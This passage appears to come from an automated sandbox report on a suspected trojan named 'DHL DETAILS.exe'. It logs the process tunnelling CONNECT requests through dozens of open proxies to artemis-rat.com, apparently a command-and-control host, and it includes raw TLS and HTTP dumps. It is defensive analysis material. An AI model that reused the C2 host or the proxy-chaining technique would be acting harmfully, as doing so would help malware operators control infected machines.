Mar 9, 2024 13:14:12.694555044 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50034	18.135.133.116	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.546999931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.854933023 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:12 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:12.855460882 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 93 6c 8c 47 68 ce 6e fc 23 7c 4c 6e e9 ba 2d 76 25 86 c4 5c cf 52 f6 6e cc 1d d2 a4 06 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRlGhn#\|Ln-v%\Rn*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:13.148432016 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 8e b2 46 6a 71 8d 54 e5 e4 49 83 ee 2c 2f e3 79 dc 5c 44 73 6a e9 64 df 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9FjqTI,/y\DsjdDOWNGRD0000H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0H0_9Q
Mar 9, 2024 13:14:13.162743092 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 a0 13 58 71 2b 9e b3 be 4a 98 0c 20 9b 66 27 7b 73 cc 96 b2 59 43 f7 74 26 50 d5 9e 06 b2 fb 77 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ee 95 e9 6c 6f f8 02 9a 88 f1 09 42 18 1c b8 d0 05 1d 77 4c da Data Ascii: %! Xq+J f'{sYCt&Pw(loBwL'&,NF
Mar 9, 2024 13:14:13.452261925 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 b8 14 f4 b7 5e 98 7b 11 b3 d9 24 dc 73 f3 6a 25 94 f1 56 9d 0d 95 97 6b ba 4d 8e 5b 69 85 cd 98 f5 07 f3 1a 37 b1 9b cc Data Ascii: (^{$sj%VkM[i7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50009	159.223.71.71	51616	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.547815084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.254940033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.254961014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50160	104.16.106.65	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.553560019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.707845926 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50015	193.239.58.92	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.557271957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50075	24.249.199.12	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.557514906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50170	104.25.230.252	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.562206030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.716581106 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50177	104.19.225.70	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.567740917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.722173929 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50178	172.67.181.136	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.568594933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.722624063 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49987	103.49.114.195	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.575509071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50131	154.205.152.96	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.582153082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.792773962 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49834	117.160.250.134	8899	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.584588051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.280531883 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50056	128.140.26.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.590816975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50164	52.13.248.29	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.592410088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.165096045 CET	65	IN	HTTP/1.1 200 Connection Established Content-Type: text/plain

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50201	104.20.233.70	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.593405008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.747976065 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50211	45.12.31.3	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.600876093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.755474091 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50215	185.162.230.201	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.604696989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.758888960 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50222	104.22.1.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.611856937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.766369104 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49789	42.61.48.219	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.616074085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.850492001 CET	74	IN	HTTP/1.1 200 OK date: Sat, 09 Mar 2024 11:54:08 GMT server: svcproxy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50227	104.18.220.95	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.617805958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.772464037 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50082	46.17.63.166	9480	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.623631954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.940139055 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50080	52.16.232.164	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.628200054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.927315950 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:12 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50224	162.253.68.97	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.661194086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50154	177.234.244.174	32213	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.667577028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.286231995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50174	52.196.1.182	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.674741983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.936184883 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:12 GMT Server: nginx Content-Type: text/plain Content-Length: 0
